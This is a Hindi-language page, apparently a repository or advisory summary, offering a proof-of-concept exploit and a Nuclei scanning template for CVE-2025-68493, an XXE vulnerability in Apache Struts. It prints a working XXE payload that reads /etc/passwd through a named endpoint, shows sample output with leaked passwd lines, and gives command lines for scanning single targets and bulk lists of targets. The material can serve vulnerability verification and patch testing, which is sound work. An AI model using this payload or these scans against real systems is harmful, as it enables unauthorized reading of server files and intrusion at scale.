
CVE-2025-68493 का पता लगाने और शोषण करने के लिए पायथन PoC स्क्रिप्ट और Nuclei YAML टेम्पलेट, Apache Struts में एक XXE भेद्यता, फ़ाइल पढ़ने और बैच स्कैनिंग सक्षम करता है।
CVE-2025-68493
[1] ApacheStrutsXWorkXML भेद्यता CVE-2025-68493 PoC और स्क्रिप्ट | ZONE.CI वैश्विक नेटवर्क. https://zone.ci/secarticles/wx/486533.html
CVE-2025-68493 भेद्यता को सत्यापित और शोषण करने के लिए, नीचे दिए गए Python PoC स्क्रिप्ट और Nuclei YAML टेम्पलेट का उपयोग किया जा सकता है।
स्क्रिप्ट नाम: cve_2025_68493_poc.py
कार्यक्षमता: यह स्क्रिप्ट एकल लक्ष्य पर भेद्यता सत्यापन करने के लिए उपयोग की जाती है, निर्दिष्ट फ़ाइल (डिफ़ॉल्ट रूप से /etc/passwd) को पढ़ने का प्रयास करती है।
पूर्वापेक्षाएँ:
requests लाइब्रेरी (pip install requests)कमांड लाइन पैरामीटर:
-u, --url: लक्ष्य एप्लिकेशन का आधार URL (उदाहरण: http://127.0.0.1:8080)-f, --file: पढ़ने का प्रयास करने के लिए लक्ष्य फ़ाइल पथ (डिफ़ॉल्ट रूप से /etc/passwd)उदाहरण:
python3 cve_2025_68493_poc.py -u http://example.com:8080 -f /etc/passwd
अपेक्षित आउटपुट:
यदि लक्ष्य में भेद्यता मौजूद है और फ़ाइल सफलतापूर्वक पढ़ी जाती है, तो निम्नलिखित जैसा आउटपुट दिखाई देगा:
[*] Testing URL: http://example.com:8080/struts2-xml-parser/xmlParserNoDtdParse
[*] Payload: <?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <foo>&xxe;</foo>
[+] Vulnerable! Successfully read /etc/passwd
----------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
----------------------------------------
टेम्पलेट नाम: cve-2025-68493.yaml
कार्यक्षमता: यह टेम्पलेट Nuclei टूल का उपयोग करके कई लक्ष्यों पर बल्क स्कैन करने के लिए उपयोग किया जाता है, ताकि CVE-2025-68493 भेद्यता का पता लगाया जा सके।
पूर्वापेक्षाएँ:
कमांड लाइन पैरामीटर:
-t: Nuclei टेम्पलेट फ़ाइल पथ निर्दिष्ट करें-u: एकल लक्ष्य URL निर्दिष्ट करें-l: कई लक्ष्य URL वाली फ़ाइल निर्दिष्ट करेंउदाहरण:
एकल लक्ष्य स्कैन:
nuclei -t cve-2025-68493.yaml -u http://example.com:8080
बल्क स्कैन:
मान लें कि आपके पास targets.txt नामक एक फ़ाइल है, जिसमें प्रत्येक पंक्ति में एक लक्ष्य URL है:
http://target1.com:8080
http://target2.com:8080
बल्क स्कैन करने के लिए निम्न कमांड चलाएँ:
nuclei -t cve-2025-68493.yaml -l targets.txt